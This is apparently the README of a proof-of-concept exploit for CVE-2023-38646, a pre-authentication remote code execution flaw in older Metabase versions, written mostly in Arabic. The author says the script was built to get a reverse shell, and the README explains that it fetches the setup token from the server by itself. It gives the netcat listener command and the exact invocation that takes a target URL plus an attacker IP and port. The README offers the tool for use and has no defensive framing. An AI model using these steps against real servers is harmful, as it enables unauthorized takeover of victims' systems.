
Metabase Pre-Auth RCE POC
تسمح Metabase مفتوحة المصدر قبل الإصدار 0.46.6.1 وMetabase Enterprise قبل الإصدار 1.46.6.1 للمهاجمين بتنفيذ أوامر تعسفية على الخادم. لقد كتبت النص مباشرة للحصول على شيل عكسي على جهاز المهاجم.
يتطلب النص عنوان URL المستهدف، وعنوان IP للمهاجم، والمنفذ. ليس من الضروري توفير token الإعداد لهذا الاستغلال حيث يحاول النص الحصول عليه من /api/session/properties.
تأكد من تشغيل مستمع netcat على جهاز المهاجم باستخدام الأمر التالي:
nc -nlvp {Port}
شغّل نص POC باستخدام:
-u - عنوان URL المستهدف (Metabase)-ip - عنوان IP للمهاجم-p - رقم المنفذpython3 CVE-2023-38646.py -u <target-url> -ip <IP> -p <PORT>
